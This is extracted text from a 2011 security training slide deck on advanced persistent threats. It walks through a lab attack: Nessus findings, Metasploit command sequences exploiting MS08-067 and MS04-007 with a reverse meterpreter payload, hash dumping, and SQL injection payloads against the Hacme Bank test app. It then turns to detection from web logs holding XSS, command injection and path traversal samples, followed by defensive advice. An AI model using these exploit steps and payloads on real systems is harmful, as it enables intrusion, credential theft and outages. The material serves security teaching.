server component co po e t as a an ASP S • Information sent between the two is encrypted Page 256 | YYYY MM DD | CONFIDENTIAL 128 10/10/2011 Nessus - Platform • Server – – – – – Windows ((XP,, 2003,, Vista,, 2008,, 7)) Mac OS X Linux (Debian, Fedora, Red Hat, SUSE, Ubuntu) FreeBSD Solaris 10 • Client – Pretty much anything with a browser (including the iPhone) Page 257 | YYYY MM DD | CONFIDENTIAL Nessus Plugins • There is a defined API for writing Nessus p g plugins – Some plugins written in C – Plugins can be written in the Nessus Attack Scripting Language (NASL) – One plugin is in charge of doing one attack and to report the rest to the Nessus server – Each p plugin g can use some functions of the Nessus library, called libnessus, and store information in a shared knowledge base. Page 258 | YYYY MM DD | CONFIDENTIAL 129 10/10/2011 Example Nessus Output Page 259 | YYYY MM DD | CONFIDENTIAL Running Nessus • https://192.168.67.12:8834 Let’s s create a scan policy • Let Page 260 | YYYY MM DD | CONFIDENTIAL 130 10/10/2011 Nessus Demonstration Page 261 | YYYY MM DD | CONFIDENTIAL Running Nessus • 192.168.67.10 – Arbitrary code can be executed on the remote host due to a flaw in the 'Server' service. – The remote host is vulnerable to a buffer overrun in the 'Server’ service that may allow an attacker to execute arbitrary code on the remote host with the 'System' privileges. • 192.168.67.10 – Arbitraryy code can be executed on the remote host through g the WINS service – The remote host has a Windows WINS server installed. The remote version of this server has two vulnerabilities that may allow an attacker to execute arbitrary code on the remote system Page 262 | YYYY MM DD | CONFIDENTIAL 131 10/10/2011 Running Nessus • 192.168.67.10 – Arbitrary code can be executed on the remote host. – The remote host is running a version of Windows that has a flaw in its RPC interface, which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. • 192.168.67.10 – The remote Windows host has an ASN.1 library that could allow an attacker to execute arbitrary code on this host. – To exploit this flaw, flaw an attacker would need to send a specially crafted ASN.1 encoded packet with improperly advertised lengths. Page 263 | YYYY MM DD | CONFIDENTIAL Running Nessus • 192.168.67.11 – Arbitrary y code can be executed on the remote host due to a flaw in the 'Server' service – The remote host is vulnerable to a buffer overrun in the 'Server’ service that may allow an attacker to execute arbitrary code on the remote host with the 'System' privileges. – Exploitable With: Canvas (CANVAS), Core Impact, M t Metasploit l it (Microsoft (Mi ft Server S Service S i Relative R l ti P Path th Stack Corruption) Page 264 | YYYY MM DD | CONFIDENTIAL 132 10/10/2011 Running Nessus • 192.168.67.13 – The remote FTP server is vulnerable to a FTP server bounce attack. – It is possible to force the remote FTP server to connect to third parties using the PORT command. • 192.168.67.13 – An administrative account on the remote host uses a weak password. – The account 'root' has the password 'password'. An attacker may use it to gain further privileges on this system Page 265 | YYYY MM DD | CONFIDENTIAL STEP 3 - Exploiting Page 266 | YYYY MM DD | CONFIDENTIAL 133 10/10/2011 Exploiting • Using the information we discovered regarding g gp ports and services,, research known vulnerabilities • Similarly, use the results from Nessus to determine exploit for a given vulnerability Page 267 | YYYY MM DD | CONFIDENTIAL MetaSploit • MS KB numbers (i.e. MS08-067) translate to MetaSploit exploit modules • http://www.metasploit.net/ modules • Search by: – (OSVD) Open Source Vulnerability Database ID – BugTraq ID – Full Text Search – (CVE) Common Vulnerabilities Exposures ID – Microsoft Security Bulletin ID Page 268 | YYYY MM DD | CONFIDENTIAL 134 10/10/2011 MetaSploit – Example #1 • MS08-067: Vulnerability in Server service could allow remote code execution – Defect in Netapi32.dll • MS08-67 on 192.168.67.11 – – – – – – Msf > use exploit/windows/smb/ms08_067_netapi Msf > Show payloads Msf > Set PAYLOAD windows/meterpreter/reverse_tcp Msf > Set LHOST [My_IP_Address] Msf > Set RHOST [Victim_IP_Address] Msf > exploit Page 269 | YYYY MM DD | CONFIDENTIAL MetaSploit – Example #1 • Now that we have executed an exploit – – – – – – Let’s own the box Meterpreter > Sysinfo meterpreter > getsystem (Elevate privilege) meterpreter > Getprivs meterpreter > Shell (grab a shell) Meterpreter > Hashdump (dump the local SAM) • Ophcrack O h k anyone? ? Page 270 | YYYY MM DD | CONFIDENTIAL 135 10/10/2011 Metasploit Demonstration Page 271 | YYYY MM DD | CONFIDENTIAL Keeping Access? • • • • Rootkit? Backdoor? Backup account? RDP? Page 272 | YYYY MM DD | CONFIDENTIAL 136 10/10/2011 How about a bit of DoS? • 192.168.67.10 – Our Windows 2003 Domain Controller • MS04-007 – Microsoft ASN.1 Library Bitstring Heap Overflow – This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. – You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the p payload y succeeds,, the system y will no longer g be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. Page 273 | YYYY MM DD | CONFIDENTIAL How about a bit of DoS? • msf > use exploit/windows/smb/ms04_007_killbill • msf exploit(ms04_007_killbill) > show payloads • msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS] • msf exploit(ms04_007_killbill) > set RHOST [TARGET IP] • msf exploit(ms04_007_killbill) > exploit Page 274 | YYYY MM DD | CONFIDENTIAL 137 10/10/2011 Metasploit Demonstration Page 275 | YYYY MM DD | CONFIDENTIAL Web Applications Page 276 | YYYY MM DD | CONFIDENTIAL 138 10/10/2011 SQL Injection - Review • SQL injection is a particularly widespread and dangerous g form of injection j – To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database – By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to th database the d t b Page 277 | YYYY MM DD | CONFIDENTIAL Hacme Bank • • • • Windows 2003 Server (patched) Microsoft IIS web server Microsoft SQL Server 2005 .NET Framework Page 278 | YYYY MM DD | CONFIDENTIAL 139 10/10/2011 Hacme Bank • Online banking application • Offers a bunch of features – Transfer funds - The application allows users of the applications to transfer funds from one account to another. – Request a loan - The users will be able to request a loan from the application to any of their internal accounts. The interest rates are preset and vary with the loan period of the loan requested – View transactions – Manage your bank accounts – Change password – Post messages Page 279 | YYYY MM DD | CONFIDENTIAL Hacme Bank • Offers a bunch of features – Admin interface • Manage all accounts • Manage messages • Manage users • Unrestricted SQL queries Page 280 | YYYY MM DD | CONFIDENTIAL 140 10/10/2011 Let’s Test the App… • Username: jv Password:jv789 • Username: jm Password: jm789 • Username: jc Password: jc789 Page 281 | YYYY MM DD | CONFIDENTIAL SQL Demonstration Page 282 | YYYY MM DD | CONFIDENTIAL 141 10/10/2011 Demo #1 • • • • ' OR 1=1– Well known hack… hack In the username or password field Standard login may look like this: – SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password‘ • Ours comes out: – SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 • Let’s try it… Page 283 | YYYY MM DD | CONFIDENTIAL Demo #1 • The expression 1=1 is always true for every row in the table,, and a true expression p or'd with another expression will always return true. • So, assuming there's at least one row in the Users table, this SQL will always return a nonzero count of records. Page 284 | YYYY MM DD | CONFIDENTIAL 142 10/10/2011 Demo #2 • ' HAVING 1=1-• What does the error give us? • Using the error information above, the attacker can determine that the name of the table storing login information is FSB_USERS and that it has a column named USER_ID. Page 285 | YYYY MM DD | CONFIDENTIAL Demo #2 • ' UNION SELECT * FROM FSB_USERS WHERE user_id = 'JV' GROUP BY user_id;-; • What does the error give us? • This process is known as database enumeration. • Armed with this information, the attacker now attempts to determine the data type of each column. Page 286 | YYYY MM DD | CONFIDENTIAL 143 10/10/2011 Demo #2 • '; INSERT INTO FSB_USERS ((USER_NAME,, LOGIN_ID,, PASSWORD,, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());-• Any thoughts on what this will do? Page 287 | YYYY MM DD | CONFIDENTIAL Browser Exploits Page 288 | YYYY MM DD | CONFIDENTIAL 144 10/10/2011 Browser Exploit • • • • Internet Explorer Memory Corruption MS10-002 MS10 002 – aka “Aurora” Aurora Solution to Aurora was DEP & ALSR We are going to run this on our Windows XP system • Just needed the user to click on a link that was trusted on a website or e e-mail mail Page 289 | YYYY MM DD | CONFIDENTIAL Aurora Demonstration Page 290 | YYYY MM DD | CONFIDENTIAL 145 10/10/2011 Browser Exploit • Internet Explorer CSS Recursive Import Use After Free • Exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml) • When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. • This leads to arbitrary code execution. • This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module Page 291 | YYYY MM DD | CONFIDENTIAL Browser Exploit • This module is reliable on all Windows versions with .NET 2.0.50727 installed (IE 6-8) • Specifically uses exploit documented in MS11003. • Just needed the user to click on a link that was trusted on a website or e-mail • Bypasses DEP and ASLR – Address space layout randomization - technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space. – Data Execution prevention - prevent an application or service from executing code from a non-executable memory region Page 292 | YYYY MM DD | CONFIDENTIAL 146 10/10/2011 DEP Bypass Demonstration Page 293 | YYYY MM DD | CONFIDENTIAL APT IN DEPTH DETECTING APT Page 294 | YYYY MM DD | CONFIDENTIAL 147 10/10/2011 All About the Traffic... • As we have seen… successful targeted attacks depend on remote access and control • The network activity associated with remote control can be identified, contained and disrupted through the analysis of outbound network traffic. • Important to know what is normal and what is not baselining • If an APT attacker wants to stay hidden, he will try to mimic normal traffic/access as much as possible Page 295 | YYYY MM DD | CONFIDENTIAL All About the Traffic... • Look for outbound traffic patterns that are out of the ordinary y – DNS requests to non-internal name servers – Large amounts of traffic leaving your network to non North American destinations – Port 80/443 requests to sites in *.ru and *.cn – Access to known malware domains – Use of credentials on interesting or abnormal systems Page 296 | YYYY MM DD | CONFIDENTIAL 148 10/10/2011 All About the Traffic... • Look for inbound traffic patterns that are out of the ordinaryy – Connections to interesting ports from unknown sources such as TCP/1433, TCP/8080, TCP/53, UDP/53 – “Normal” looking traffic from countries you do not do business with (i.e. China TCP/80) – Consistent inbound “portscan” traffic from eastern Europe and Asia on non-well known ports (i.e. C&C) Page 297 | YYYY MM DD | CONFIDENTIAL All About the Traffic Page 298 | YYYY MM DD | CONFIDENTIAL 149 10/10/2011 All About the Traffic – Typical Botnet Look at all the sources of information… Page 299 | YYYY MM DD | CONFIDENTIAL Web Traffic • Another important source of information • If you can pull it into a SIEM, you’re job could be easier • Manually, you want to look at the following: – Apache – access_log, error_log – IIS6 - %windir%\System32\LogFiles, IIS7 %SystemDrive%\inetpub\logs\LogFiles • Looking at these logs will help you identify: – – – – SQL IInjection j ti attacks tt k XSS Path Traversal Etc. Page 300 | YYYY MM DD | CONFIDENTIAL 150 10/10/2011 Web Traffic - XSS • 217.160.165.173 [12/Mar/2004:22:31:12 0500] "GET /foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200 578 “-” "Mozilla/4.75 [en] (X11, U; Nessus)“ • 217.160.165.173 [12/Mar/2004:22:37:17 0500] "GET /cgibin/cvslog.cgi?file=<SCRIPT>window.alert</SCRI PT> HTTP/1.1" 403 302 “-” "Mozilla/4.75 [en] (X11, U; Nessus)“ • These represent XSS type attacks Page 301 | YYYY MM DD | CONFIDENTIAL Web Traffic - Injection • 81.171.1.165 [13/Mar/2004:10:46:43 0500] "HEAD http://www.sweetgeorgia.com/cgibin/af.cgi?_b rowser_out=|echo;id;exit| HTTP/1.0" 200 0 "http://www.sweetgeorgia.com/cgibin/af.cgi?_ browser_out=|echo;id;exit|" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)“ • Trying y g to e execute ecute OS commands. co a ds The e variable '_browser_out' contains a pipe symbol, followed by Unix system commands ('|echo;id;exit|'). Page 302 | YYYY MM DD | CONFIDENTIAL 151 10/10/2011 Web Traffic - Injection • 66.138.147.49 [13/Mar/2004:13:33:06 0500] "GET http://login.korea.yahoo.com/config/login?.redir_from =PROFILES?.&login=&.tries=1&.src=jpg&.last=&pro mo=&.intl=us&.bypass=&.partner=&.chkP=Y&.done= http://jpager.yahoo.com/jpager/pager2.shtml&login=bl ood`1234567890&passwd=password HTTP/1.0" 200 566 ""““ • Calling a login function. In its login name (parameter 'l i ') is 'login') i a back b k tick i k symbol b l ('bl ('blood`1234567890'). d`1234 6 890') • This might be a simple brute force attack or a test how the application handles the back tick symbol. Page 303 | YYYY MM DD | CONFIDENTIAL Web Traffic – Path Traversal • 68.48.142.117 [09/Mar/2004:22:29:43 0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/+dir HTTP/1.0” 200 566 “” "“ • The '%255c' is a double percent hex encoding. The '%25’ resolves to a percent character ('%'), the resulting '%5c’ resolves to a backslash ('\'). • The request tries to access the cmd.exe program, the windows command shell to execute the 'dir’ command (list all files in a directory). Page 304 | YYYY MM DD | CONFIDENTIAL 152 10/10/2011 Detecting APT SECURITY INFORMATION EVENT MANAGEMENT Page 305 | YYYY MM DD | CONFIDENTIAL Security Information Event Mgmt. • Aka “SIEM” • Reducing Security Information “Overload” Overload” • Gathering, correlating, aggregating, analyzing and presenting information from disparate systems • Normally provides dashboards, alerting, etc to allow security analysts to weight through the millions of events in their organizations • Some free tools – Splunk, OSSEC, Snort Page 306 | YYYY MM DD | CONFIDENTIAL 153 10/10/2011 Use of SIEM Products • On their own, they are useless • SIEM products do a great job at aggregating and correlating traffic • Without intelligence, a SIEM won't detect a relentless targeted attack designed to avoid raising any red flags • They They're re normally tuned to catch unusual activity, not stealthy attacks that hide behind legitimate user credentials or normal traffic. Page 307 | YYYY MM DD | CONFIDENTIAL “A b better SIEM with i h faster f results l and d operationalizing security data in a way that closes that window and risk in a more timely manner limits the amount of time the attacker” (Eddie Schwartz – CSO, RSA) Page 308 | YYYY MM DD | CONFIDENTIAL 154 10/10/2011 Exception Monitoring • A SIEM is designed to alert on events (the “E” in SIEM) • We have to focus on what traffic/activity is normal = “Baseline” and then zero in on the exceptions to this • Organizations put lots of dollars buying SIEMS to meet PCI-DSS compliance • We have re-direct our SIEM to deal APT non compliant • We are not simply looking for non-compliant systems based on a predetermined policy, we are looking at modeling behavior and understanding what is normal and what is not Page 309 | YYYY MM DD | CONFIDENTIAL Exception Monitoring – Example #1 • Say your SIEM logs physical access (through yyour ID badge g system) y ) • On Tuesday at 4:00pm you see Joe Smith swipe his card exiting the HQ building • On Tuesday at 4:02pm you see Joe Smith login in to a server on the perimeter of your network… et o • Correlation becomes very important! Page 310 | YYYY MM DD | CONFIDENTIAL 155 10/10/2011 Exception Monitoring – Example #2 • Sally is a financial analyst who accesses PeopleSoft, e-mail, billing system • On Wednesday, logs show she has attempted to access a Unix box running DNS for the organization • Sally, based on access correlation and baselining, logs into the Active Directory between 8:30am and 8:39am M-F • We have noted logins to the AD on Saturday and Sunday at 1:31am, 6:02am, and 8:33pm. • What does this tell us? Page 311 | YYYY MM DD | CONFIDENTIAL APT IN DEPTH HOW DO I PROTECT MYSELF? Page 312 | YYYY MM DD | CONFIDENTIAL 156 10/10/2011 What do I do? 1. 2 2. 3. 4. Early warning Protection Remediation Counter measures Page 313 | YYYY MM DD | CONFIDENTIAL Before you can protect yourself… • You have to understand A/V is not going to answer the following: g – – – – – – – Who is targeting you? What are they after? Have the succeeded? How long have they been succeeding? What I have lost so far? Who is patient zero? How does this spread? Page 314 | YYYY MM DD | CONFIDENTIAL 157 10/10/2011 Time to Update Your Inventory… • Organizations have to start to better understand what assets they have hanging out on the public Internet • In many cases, organizations are hit because they didn’t know about that “box in corner, under someone’s desk, that has a NAT to the Internet”. Page 315 | YYYY MM DD | CONFIDENTIAL Inspect/Secure DNS • Watching your DNS logs to see what users are trying y g to resolve • Could lead you to understand whether or not users are infected (C&C) or whether they are going to be (phishing links) • Are you allowing DNS resolution on name servers se e s outs outside de you your o organization? ga at o • Split DNS Split/split DNS split/split/split DNS Page 316 | YYYY MM DD | CONFIDENTIAL 158 10/10/2011 Architect Your Network for Attack • Expect that a breach will occur – architect based on this • Layer your security controls (router perimeter firewall proxy host FW host security) • Although layering is important always remember -- increased emphasis on protecting the data itself. • Increase the level of monitoring g and intrusion detection • Honeypots can help • The dreaded “ANY/ANY” (both ingress/egress) Page 317 | YYYY MM DD | CONFIDENTIAL Take Care of Your Web Apps • Web applications remain the low-hanging fruit for attackers. • Yes, penetration testing is important - but these measures perpetuate a whack-a-mole security strategy that is neither manageable nor sustainable • Make a e investments est e ts in secure secu e code review, e e , securely configured Web server environments, and vigilant monitoring of Web activity. Page 318 | YYYY MM DD | CONFIDENTIAL 159 10/10/2011 Take Care of Your Web Apps • Monitor their logs – incorporate into your SIEM • Deploy and application proxy such as mod proxy – Screens and blocks common vulnerable requests (i.e. SQL injection, XSS, etc) – Advanced audit and logging functionality – Layer L off obfuscation bf ti – your web b app iis nott di directly tl on the Internet Page 319 | YYYY MM DD | CONFIDENTIAL Geo-blocking…. • Block IP networks based on country location • Can be ingress and/or egress • For example, block all traffic from China, Ukraine, etc. • Usually done at a perimeter router level • Not always easy - to block a country you first must have the entire range of IP Addresses that where assigned to that country – you could block legitimate traffic! Page 320 | YYYY MM DD | CONFIDENTIAL 160 10/10/2011 Watch Network Traffic • Look at the possibility of a SIEM tool – allow for aggregation and correlation (there are commercial and open source flavors of this) • Normalize your network traffic patterns – What is normal and what is not (isolate what is not, and investigate as possible attacks) • Look at DLP as a potential solution • Rootkits can hide on a system but network traffic cannot be hidden • Understand all traffic patterns and look for anomalies – If you have an IDS/IPS make sure it is baselined Page 321 | YYYY MM DD | CONFIDENTIAL Watch Network Traffic • Monitor cyber security events 24 x 7. – Advanced p persistent threats like those that hit organizations are just that--persistent--and require constant vigilance. • Across federal government, agencies are investing in "continuous monitoring," with a goal of obtaining a near real-time view into the status of computer system security security. Page 322 | YYYY MM DD | CONFIDENTIAL 161 10/10/2011 Protect the Endpoint • Patch your systems – Un-patched Adobe ((Acrobat,, Flash), ), and Microsoft (Windows, ( , Office) are big reasons why machines are infected • Protect the endpoint – Whitelisting technology? block everything else. we know what is good, Page 323 | YYYY MM DD | CONFIDENTIAL Test Your Systems • Perform a risk assessment to understand where to focus their p protective systems y (important as cost may be prohibitive to secure everything) • Vulnerability management (i.e. scanning system) to continually scan assets for systems that may fall outside of compliance (i.e. configuration, patches, etc) Page 324 | YYYY MM DD | CONFIDENTIAL 162 10/10/2011 Proxy your Internet Traffic • • • • As opposed to direct Internet via a NAT Control and logging Consider “honeypotting” for internal networks You can use whitelisting/blacklisting technologies as well (i.e. Web Sense, 8e6, BlueCoat, etc.) Page 325 | YYYY MM DD | CONFIDENTIAL Response • Have a proper Incident response process on how to deal with these issues • Remove devices from the network immediately or monitor what the attackers are doing • Post event analysis is important as well Page 326 | YYYY MM DD | CONFIDENTIAL 163 10/10/2011 Research • Keep up to date on intelligence reports from trusted security y sources on what attacks you y need to look at for – many times specific attack vectors can be found (i.e. C&C connects to systems on port TCP/666) Page 327 | YYYY MM DD | CONFIDENTIAL Intelligence Feeds • • • • • Malwaredomainlist.com Abuse ch Abuse.ch Spamcop.net Team-cymru.net Shadowserver.org Page 328 | YYYY MM DD | CONFIDENTIAL 164 10/10/2011 Education • Make sure your security team (or group responsible for monitoring) knows what to look for (i.e. education) • Education – About spear-phishing, malware sites, etc (what should they not click, not plugging unknown USB sticks into their PCs, etc) – get other groups that can be vocal for you to ass assist st ((i.e. e PR,, HR,, etc) • Social engineering is a real threat – ensure your organization is trained on how to deal with this threat Page 329 | YYYY MM DD | CONFIDENTIAL Test your Organization • Spear-phish a sample of your staff from a crafted e-mail account • Include a link to a website, log traffic • Leave some candy in the lunchroom (i.e. DVD, USB stick, etc) – think autorun. • You will be surprised what you find! Page 330 | YYYY MM DD | CONFIDENTIAL 165 10/10/2011 Control Systems • If you are an organization that has sensitive control systems (i.e. power utility) • Next-generation automation and control systems must be hardened and made resilient against the same kinds of attacks we contend with on the Internet. • Traditional control system design assumptions and security measures need to be reassessed as embedded b dd d d devices i adopt d t open, rather th th than proprietary, standards, and as logical and even physical separation from the Internet become harder to assure Page 331 | YYYY MM DD | CONFIDENTIAL Purge legacy, minority technologies • The Web server in the first attack was based on a little-used technology gy at the lab,, Adobe ColdFusion. • Such out-of-sight, out-of-mind technologies are inherently vulnerable because they don't get the same degree of attention as an organization's primary platforms. Page 332 | YYYY MM DD | CONFIDENTIAL 166 10/10/2011 On a closing note…. “Maintain a constant state of Suspicious Alertness!” Lieutenant Colonel Kazinski, Jarhead (2005) Page 333 | YYYY MM DD | CONFIDENTIAL Thank you! Questions or Comments? Peter Morin 902 229 6282 902-229-6282 peter.morin@bellaliant.ca http://www.twitter.com/@petermorin123 Page 334 | YYYY MM DD | CONFIDENTIAL 167